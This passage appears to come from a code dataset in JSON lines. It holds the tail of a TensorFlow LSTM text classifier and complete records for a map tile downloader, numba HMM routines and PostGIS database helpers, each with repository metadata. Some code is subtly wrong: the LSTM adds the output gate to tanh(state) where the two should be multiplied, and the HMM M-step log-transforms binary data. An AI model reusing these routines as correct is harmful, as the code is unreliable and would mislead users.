runn_output:[batch_size,num_timestep,lstm_outputs[-1]\r\n rnn_output, _ = tf.nn.dynamic_rnn(cell, embedded_inputs, initial_state=initial_state)\r\n last_output = rnn_output[:, -1, :]\r\n '''\r\n\r\n # 输入门\r\n with tf.variable_scope('input'):\r\n x_in, h_in, b_in = _generate_paramas(\r\n x_size=[embedding_size, lstm_nodes[0]],\r\n h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n b_size=[1, lstm_nodes[0]]\r\n )\r\n # 输出门\r\n with tf.variable_scope('output'):\r\n x_out, h_out, b_out = _generate_paramas(\r\n x_size=[embedding_size, lstm_nodes[0]],\r\n h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n b_size=[1, lstm_nodes[0]]\r\n )\r\n # 遗忘门\r\n with tf.variable_scope('forget'):\r\n x_f, h_f, b_f = _generate_paramas(\r\n x_size=[embedding_size, lstm_nodes[0]],\r\n h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n b_size=[1, lstm_nodes[0]]\r\n )\r\n # 中间状态\r\n with tf.variable_scope('mid_state'):\r\n x_m, h_m, b_m = _generate_paramas(\r\n x_size=[embedding_size, lstm_nodes[0]],\r\n h_size=[lstm_nodes[0], lstm_nodes[0]],\r\n b_size=[1, lstm_nodes[0]]\r\n )\r\n # 两个初始化状态,隐含状态state和初始输入h\r\n state = tf.Variable(tf.zeros([batch_size, lstm_nodes[0]]), trainable=False)\r\n h = tf.Variable(tf.zeros([batch_size, lstm_nodes[0]]), trainable=False)\r\n # 遍历每个词的输入过程\r\n for i in range(max_words):\r\n # 取出每轮输入,三维数组embedd_inputs的第二维代表训练的轮数\r\n embedded_input = embedded_inputs[:, i, :]\r\n # 将取出的结果reshape为二维\r\n embedded_input = tf.reshape(embedded_input, [batch_size, embedding_size])\r\n # 遗忘门计算\r\n forget_gate = tf.sigmoid(tf.matmul(embedded_input, x_f) + tf.matmul(h, h_f) + b_f)\r\n # 输入门计算\r\n input_gate = tf.sigmoid(tf.matmul(embedded_input, x_in) + tf.matmul(h, h_in) + b_in)\r\n # 输出门\r\n output_gate = tf.sigmoid(tf.matmul(embedded_input, x_out) + tf.matmul(h, h_out) + b_out)\r\n # 中间状态\r\n mid_state = tf.tanh(tf.matmul(embedded_input, x_m) + tf.matmul(h, h_m) + b_m)\r\n # 计算隐含状态state和输入h\r\n state = state * forget_gate + input_gate * mid_state\r\n h = output_gate + tf.tanh(state)\r\n # 最后遍历的结果就是LSTM的输出\r\n last_output = h\r\n\r\n # 构建全连接层\r\n fc_init = tf.uniform_unit_scaling_initializer(factor=1.0)\r\n with tf.variable_scope('fc', initializer=fc_init):\r\n fc1 = tf.layers.dense(last_output, fc_nodes, activation=tf.nn.relu, name='fc1')\r\n fc1_drop = tf.contrib.layers.dropout(fc1, keep_prob)\r\n logits = tf.layers.dense(fc1_drop, num_classes, name='fc2')\r\n\r\n # 定义评估指标\r\n with tf.variable_scope('matrics'):\r\n # 计算损失值\r\n softmax_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=outputs)\r\n loss = tf.reduce_mean(softmax_loss)\r\n # 计算预测值,求第1维中最大值的下标,例如[1,1,5,3,2] argmax=> 2\r\n y_pred = tf.argmax(tf.nn.softmax(logits), 1, output_type=tf.int32)\r\n # 求准确率\r\n correct_prediction = tf.equal(outputs, y_pred)\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n # 定义训练方法\r\n with tf.variable_scope('train_op'):\r\n train_var = tf.trainable_variables()\r\n # for var in train_var:\r\n # print(var)\r\n # 对梯度进行裁剪防止梯度消失或者梯度爆炸\r\n grads, _ = tf.clip_by_global_norm(tf.gradients(loss, train_var), clip_norm=lstm_grads)\r\n # 将梯度应用到变量上去\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\r\n train_op = optimizer.apply_gradients(zip(grads, train_var), global_steps)\r\n\r\n # 以元组的方式将结果返回\r\n return ((inputs, outputs, keep_prob),\r\n (loss, accuracy),\r\n (train_op, global_steps))\r\n\r\n\r\n# 运行模型构建函数,并将返回的参数赋值给外部\r\nplaceholders, matrics, others = create_model(train_list_size, num_classes)\r\ninputs, outputs, keep_prob = placeholders\r\nloss, accuracy = matrics\r\ntrain_op, global_steps = others\r\n\r\n# 进行训练\r\ninit_op = tf.global_variables_initializer()\r\ntrain_keep_prob = 0.8 # 训练集的dropout比率\r\ntrain_steps = 10000\r\n\r\nwith tf.Session() as sess:\r\n sess.run(init_op)\r\n\r\n for i in range(train_steps):\r\n # 按批次获取训练集数据\r\n batch_inputs, batch_labels = train_set.next_batch(batch_size)\r\n # 运行计算图\r\n res = sess.run([loss, accuracy, train_op, global_steps],\r\n feed_dict={inputs: batch_inputs, outputs: batch_labels,\r\n keep_prob: train_keep_prob})\r\n loss_val, acc_val, _, g_step_val = res\r\n if g_step_val % 20 == 0:\r\n print('第%d轮训练,损失:%3.3f,准确率:%3.5f' % (g_step_val, loss_val, acc_val))\r\n", "repo_name": "SuperTory/MachineLearning", "sub_path": "TextRNN/TextRNN.py", "file_name": "TextRNN.py", "file_ext": "py", "file_size_in_byte": 14644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.walk", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "jieba.cut", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 147, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 152, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 187, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 187, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 190, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 192, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 192, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 196, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 197, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 197, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.embedding_lookup", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 199, "usage_type": "attribute"}, {"api_name": "tensorflow.get_variable", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.constant_initializer", "line_number": 206, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 209, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform_initializer", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 211, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 230, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 237, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 244, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 251, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 258, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 259, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 265, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 267, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 267, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 269, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 269, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.tanh", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.tanh", "line_number": 276, "usage_type": "call"}, {"api_name": "tensorflow.uniform_unit_scaling_initializer", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 283, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 283, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 283, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.dropout", "line_number": 284, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 284, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 285, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 285, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 288, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 290, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 290, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 291, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 293, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 293, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 293, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 293, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 295, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 296, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 296, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 296, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 299, "usage_type": "call"}, {"api_name": "tensorflow.trainable_variables", "line_number": 300, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_global_norm", "line_number": 304, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 304, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 306, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 306, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 322, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 326, "usage_type": "call"}]} +{"seq_id": "45450326941", "text": "import sys\nimport os\nimport math\nimport imghdr\nfrom globalmaptiles import GlobalMercator\nfrom downloader import Downloader\n\nclass TileLoader(object):\n TILE_WIDTH = 256 # tile is square\n TILE_FORMAT = 'png'\n\n def __init__(self, min_lat, min_lon, max_lat, max_lon, width, max_zoom = 18):\n self.tiles = []\n self.min_lat = min_lat\n self.min_lon = min_lon\n self.max_lat = max_lat\n self.max_lon = max_lon\n self.mercator = GlobalMercator()\n self.downloader = Downloader()\n # count how many horizontal tiles we need\n self.x_tiles_needed = math.ceil(width / self.TILE_WIDTH)\n self.max_zoom = max_zoom\n\n def download(self, cache_dir, url, http_headers):\n \"\"\"Downloads tiles and returns list of downloaded tiles.\"\"\"\n tile_files = {}\n tiles = self._get_tile_list()\n for (tx, ty, tz) in tiles:\n cx, cy, cz = self._convert_tile(tx, ty, tz)\n tile_url = url.replace('{x}', str(cx)).replace('{y}', str(cy)).replace('{z}', str(cz))\n tile_file = self._gen_tile_file(tx, ty, tz, cache_dir)\n self.downloader.download(tile_file, tile_url, http_headers)\n tile_files[tile_url] = tile_file\n\n # wait downloads to be finished\n self.downloader.wait()\n\n # validate all tiles\n valid = True\n for tile_url, tile_file in tile_files.iteritems():\n if self.TILE_FORMAT == 'png' and imghdr.what(tile_file) != 'png':\n sys.stderr.write(\"%s is not PNG image\\n\" % tile_url)\n valid = False\n if not valid:\n return None\n\n return tile_files.values()\n\n def _get_tile_list(self):\n \"\"\"Returns list of tiles needed to cover bounding box.\"\"\"\n tiles = []\n tile_info = self._find_tiles()\n if tile_info is not None:\n (tminx, tminy, tmaxx, tmaxy, tz) = tile_info\n for ty in range(tminy, tmaxy + 1):\n for tx in range(tminx, tmaxx + 1):\n tiles.append((tx, ty, tz))\n return tiles\n\n def _find_tiles(self):\n \"\"\"Returns optimal zoom level based on given width.\"\"\"\n for zoom_level in range(1, self.max_zoom + 1):\n tminx, tminy = self._lat_lon_to_tile(self.min_lat, self.min_lon, zoom_level)\n tmaxx, tmaxy = self._lat_lon_to_tile(self.max_lat, self.max_lon, zoom_level)\n x_tiles = tmaxx + 1 - tminx\n if x_tiles > self.x_tiles_needed or zoom_level == self.max_zoom:\n # optimal zoom level found\n return (tminx, tminy, tmaxx, tmaxy, zoom_level)\n return None\n\n def _lat_lon_to_tile(self, lat, lon, zoom_level):\n \"\"\"Converts given latLon to tile XY\"\"\"\n mx, my = self.mercator.LatLonToMeters(lat, lon)\n tx, ty = self.mercator.MetersToTile(mx, my, zoom_level)\n return (tx, ty)\n\n def _gen_tile_file(self, tx, ty, tz, cache_dir):\n \"\"\"Returns filename where tile will be saved as.\"\"\"\n filename = \"%d_%d_%d.%s\" % (tx, ty, tz, self.TILE_FORMAT)\n return os.path.join(cache_dir, filename)\n\nclass TMSTileLoader(TileLoader):\n def _convert_tile(self, tx, ty, tz):\n return tx, ty, tz\n\nclass GoogleTileLoader(TileLoader):\n def _convert_tile(self, tx, ty, tz):\n gx, gy = self.mercator.GoogleTile(tx, ty, tz)\n return gx, gy, tz\n\nclass FTileLoader(TileLoader):\n def _convert_tile(self, tx, ty, tz):\n fx = tx - 2**(tz - 1)\n fy = ty - 2**(tz - 1)\n fz = 18 - tz\n return fx, fy, fz\n", "repo_name": "iqqmuT/toe", "sub_path": "export/mapnik/tileloader.py", "file_name": "tileloader.py", "file_ext": "py", "file_size_in_byte": 3565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "globalmaptiles.GlobalMercator", "line_number": 18, "usage_type": "call"}, {"api_name": "downloader.Downloader", "line_number": 19, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 21, "usage_type": "call"}, {"api_name": "imghdr.what", "line_number": 41, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "73073752764", "text": "import numpy as np\nfrom numba import njit\nfrom numba import prange\n\n@njit\ndef logsumexp(log_mat, axis = 0):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_mat, 2D numpy array\n - axis, int\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function implements a numerically stable version of the\n logsumexp function along a given axis.\n\n It takes as input the log of a matrix and returns the log of the\n sum along an axis of the exponential of the matrix.\n -----------------------------------------------------------------\n \"\"\"\n nconst = np.max(log_mat)\n out = np.sum(np.exp(log_mat - nconst), axis = axis)\n return nconst + np.log(out)\n\n\n@njit\ndef log_domain_matmul(log_A, log_B):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_A, 2D numpy array of shape m x n\n - log_B, 2D numpy array of shape n x p\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function implements the log version of the multiplication\n between two matrices C_{ij} = \\sum_k A_{ik} B_{kj}, which gives\n\n \\log C_{ij} = \\log \\sum_{k} \\exp[log A_{ik} + log B_{k,j}]\n\n so we can work with the log of the matrices directly.\n -----------------------------------------------------------------\n \"\"\"\n\n m = log_A.shape[0]\n n = log_A.shape[1]\n p = log_B.shape[1]\n\n elementwise_sum = np.empty((m, p, n), dtype = np.float64)\n log_A_hD = np.empty((m, n, 1), dtype = np.float64)\n log_B_hD = np.empty((1, n, p), dtype = np.float64)\n\n log_A_hD = np.expand_dims(log_A, axis = 2)\n log_B_hD = np.expand_dims(log_B, axis = 0)\n elementwise_sum = log_A_hD + log_B_hD\n\n return logsumexp(elementwise_sum, axis = 1)\n\n\n@njit(parallel = True)\ndef emission_model(log_emission_matrix, x):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_emission_matrix, 2D numpy array of shape N x D\n - x, 1D numpy array of shape T\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates the log of the probability of observing\n the sequence of observed states x given that the system is in the\n i-th hidden state at time t. x is observed for T timesteps, x[t]\n is a D-dimensional array and the system can be in N hidden states.\n\n The result is a T x N matrix where each column gives the logarithm\n of the probability of observing x[t] for each of the hidden states\n the system can be in.\n -----------------------------------------------------------------\n \"\"\"\n emission_matrix = np.exp(log_emission_matrix)\n T = x.shape[0]\n N = emission_matrix.shape[0]\n emission_probabilities = np.empty((T, N), dtype = np.float64)\n\n # Note: must avoid the fact that numba does not support the axis kwarg\n # in the product function; implement using a bunch of for cycles that\n # are later deployed in C. Parallelize the execution over time\n\n for t in prange(T):\n to_marginalize = emission_matrix*x[t] + (1-emission_matrix)*(1-x[t])\n for i in range(to_marginalize.shape[0]):\n marg = 1\n for j in range(to_marginalize.shape[1]):\n marg *= to_marginalize[i][j]\n\n emission_probabilities[t][i] = marg\n\n # double pass to free the array from the prange bug\n to_log = emission_probabilities\n return np.log(to_log)\n\n\n@njit\ndef forward_backward(log_emission_probabilities, log_transition_matrix, log_state_priors):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_emission_probabilities, 2D numpy array of shape\n T x N\n - log_transition_matrix, 2D numpy array of shape\n N x N\n - log_state_priors, 1D numpy array of shape N\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates in a single pass the log of the forward\n and the backward probabilities of the Hidden Markov Model.\n -----------------------------------------------------------------\n \"\"\"\n\n T, N = log_emission_probabilities.shape\n log_alpha = np.empty((T, N), dtype = np.float64)\n log_beta = np.empty((T, N), dtype = np.float64)\n\n log_beta[T-1] = np.zeros(N, dtype = np.float64)\n log_alpha[0] = log_emission_probabilities[0] + log_state_priors\n\n for t in range(1, T):\n a_matrix_mult = log_domain_matmul(log_alpha[t-1].reshape(1, N), log_transition_matrix)\n log_alpha[t] = log_emission_probabilities[t] + a_matrix_mult\n\n b_elementwise_mult = log_emission_probabilities[T-t] + log_beta[T-t]\n b_matrix_mult = log_domain_matmul(log_transition_matrix, b_elementwise_mult.reshape(N,1))\n log_beta[T-t-1] = b_matrix_mult.reshape(-1)\n\n return log_alpha, log_beta\n\n\n@njit\ndef evaluate_log_gamma(log_alpha, log_beta):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_alpha, 2D numpy array of shape T x N\n - log_beta, 2D numpy array of shape T x N\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates the probability that the Hidden Markov\n Model is in one of the possible hidden states at each time, given\n its parameters (that are encoded in the foward and backward\n probabilities).\n -----------------------------------------------------------------\n \"\"\"\n g = np.empty(log_alpha.shape, dtype = np.float64)\n g = log_alpha + log_beta\n return g - np.expand_dims(logsumexp(g, axis = 1), axis = 1)\n\n\n@njit\ndef evaluate_log_xi(log_gamma, log_beta, log_transition_matrix, log_emission_probabilities):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_gamma, 2D numpy array of shape T x N\n - log_transition_matrix, 2D numpy array of shape\n N x N\n - log_emission_probabilities, 2D numpy array of shape\n T x N\n - log_beta, 2D numpy array of shape T x N\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function evaluates the probability that the Hidden Markov\n Model is in a subsequent pair of the possible hidden states at\n each times (t-1, t), given its parameters.\n -----------------------------------------------------------------\n \"\"\"\n T = log_gamma.shape[0]\n N = log_gamma.shape[1]\n log_xi = np.empty((T-1, N, N), dtype = np.float64)\n\n log_xi = np.expand_dims(log_gamma[:-1], axis = 2) + log_transition_matrix \\\n + np.expand_dims(log_emission_probabilities[1:], axis = 1) \\\n + np.expand_dims(log_beta[1:], axis = 1) \\\n - np.expand_dims(log_beta[:-1], axis = 2)\n\n return log_xi\n\n@njit\ndef M_step(log_gamma, log_xi, log_transition_matrix, x):\n \"\"\"\n -----------------------------------------------------------------\n Arguments: - log_gamma, 2D numpy array of shape T x N\n - log_xi, 3D numpy array of shape (T - 1) x N x N\n - log_transition_matrix, 2D numpy array of shape\n N x N\n - x, 1D numpy array of shape T\n -----------------------------------------------------------------\n -----------------------------------------------------------------\n This function performs the maximization step for a D-dimensional\n binomial Hidden Markov Model. The M-step evaluates a new set of\n parameters to minimize the overall likelihood of the model for\n the observed data.\n -----------------------------------------------------------------\n \"\"\"\n\n T = log_gamma.shape[0]\n N = log_gamma.shape[1]\n D = x.shape[1]\n\n up_log_state_prior = np.empty(N, dtype = np.float64)\n up_log_transition_matrix = np.empty((N, N), dtype = np.float64)\n up_log_emission_matrix = np.empty((N, D), dtype = np.float64)\n\n up_log_state_prior = log_gamma[0]\n up_log_transition_matrix = logsumexp(log_xi, axis = 0) \\\n - np.expand_dims(logsumexp(log_gamma[:-1], axis = 0), axis = 1)\n\n up_log_emission_matrix = log_domain_matmul(log_gamma.T, np.log(x)) \\\n - np.expand_dims(logsumexp(log_gamma, axis = 0), axis = 1)\n\n return up_log_state_prior, up_log_transition_matrix, up_log_emission_matrix\n", "repo_name": "giorgionicoletti/binomial_hmm", "sub_path": "lib/fun.py", "file_name": "fun.py", "file_ext": "py", "file_size_in_byte": 8865, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 22, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 5, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 51, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numba.prange", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 95, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 116, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numba.njit", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 148, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 132, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 175, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 151, "usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 203, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 210, "usage_type": "call"}, {"api_name": "numba.njit", "line_number": 179, "usage_type": "name"}]} +{"seq_id": "6534495064", "text": "from typing import Callable, List, Union\nimport graph_build.graph_green_view_join.env as env\nimport pandas as pd\nfrom geopandas import GeoDataFrame\nfrom sqlalchemy import create_engine, inspect, text\nfrom functools import partial\n\n\ndef __get_conn_string(db: str) -> str:\n return f'postgresql://{env.db_user}:{env.db_pass}@{env.db_host}:{env.db_port}/{db}'\n\n\ndef __write_to_postgis(\n log,\n sql_engine,\n gdf: GeoDataFrame,\n table_name: str,\n if_exists: str = 'replace',\n index: bool = False\n) -> None:\n\n log.info('Writing GeoDataFrame to PostGIS:')\n log.info(f'{gdf.head()}')\n\n gdf.to_postgis(\n table_name,\n sql_engine,\n if_exists=if_exists,\n chunksize=50000,\n index=index\n )\n\n __execute_sql(log, sql_engine, f'''\n ALTER TABLE {table_name} RENAME COLUMN geometry TO geom;\n ALTER INDEX idx_{table_name}_geometry\n RENAME TO idx_{table_name}_geom;\n ''')\n\n\ndef get_db_writer(\n log,\n b_inspect: bool = False,\n inspect_table: str = None,\n db: str = 'gp'\n) -> Callable[[GeoDataFrame, str, str, bool], None]:\n\n engine = create_engine(__get_conn_string(db))\n\n if b_inspect and inspect_table:\n inspector = inspect(engine)\n print(inspector.get_columns(inspect_table))\n\n return partial(__write_to_postgis, log, engine)\n\n\ndef __execute_sql(\n log,\n engine,\n query_str: str,\n logging: bool = False,\n returns: bool = False,\n dry_run: bool = False\n) -> Union[None, list]:\n\n queries = query_str.split(';') if ';' in query_str else [query_str]\n queries = [query.strip() for query in queries if len(query.strip()) > 0]\n\n all_rows = []\n with engine.connect() as conn:\n for query in queries:\n log.info(f'{\"Executing SQL:\" if not dry_run else \"Skipping SQL:\"}\\n{query}')\n if dry_run:\n continue\n result = conn.execute(text(query))\n if result.cursor and (logging or returns):\n rows = result.fetchall()\n if logging:\n log.info('Result rows:')\n for row in rows:\n log.info(f'{row}')\n if returns:\n all_rows += rows\n if not dry_run:\n log.info('SQL execution finished')\n\n if returns:\n return all_rows\n\n\ndef get_sql_executor(\n log,\n db: str = 'gp'\n) -> Callable[\n [\n str, Union[bool, None], Union[bool, None], Union[bool, None]],\n Union[list, None]\n ]:\n\n engine = create_engine(__get_conn_string(db))\n return partial(__execute_sql, log, engine)\n\n\ndef get_db_table_names(\n execute_sql: Callable[[str], list]\n) -> List[str]:\n\n db_tables = execute_sql(\n '''\n SELECT table_name\n FROM information_schema.tables\n WHERE table_schema = 'public'\n ORDER BY table_name;\n ''',\n returns=True\n )\n return [r for r, in db_tables]\n\n\ndef read_db_table_to_df(table: str, db='gp') -> pd.DataFrame:\n engine = create_engine(__get_conn_string(db))\n with engine.connect() as conn:\n return pd.read_sql(f'SELECT * FROM {table}', conn)\n", "repo_name": "DigitalGeographyLab/green-path-server", "sub_path": "src/graph_build/graph_green_view_join/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 3179, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "41", "api": [{"api_name": "graph_build.graph_green_view_join.env.db_user", "line_number": 10, "usage_type": "attribute"}, {"api_name": "graph_build.graph_green_view_join.env", "line_number": 10, "usage_type": "name"}, {"api_name": "graph_build.graph_green_view_join.env.db_pass", "line_number": 10, "usage_type": "attribute"}, {"api_name": "graph_build.graph_green_view_join.env.db_host", "line_number": 10, "usage_type": "attribute"}, {"api_name": "graph_build.graph_green_view_join.env.db_port", "line_number": 10, "usage_type": "attribute"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 16, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 47, "usage_type": "call"}, {"api_name": "sqlalchemy.inspect", "line_number": 50, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 53, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 45, "usage_type": "name"}, {"api_name": "geopandas.GeoDataFrame", "line_number": 45, "usage_type": "name"}, {"api_name": "sqlalchemy.text", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlalchemy.create_engine", "line_number": 99, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 100, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 96, 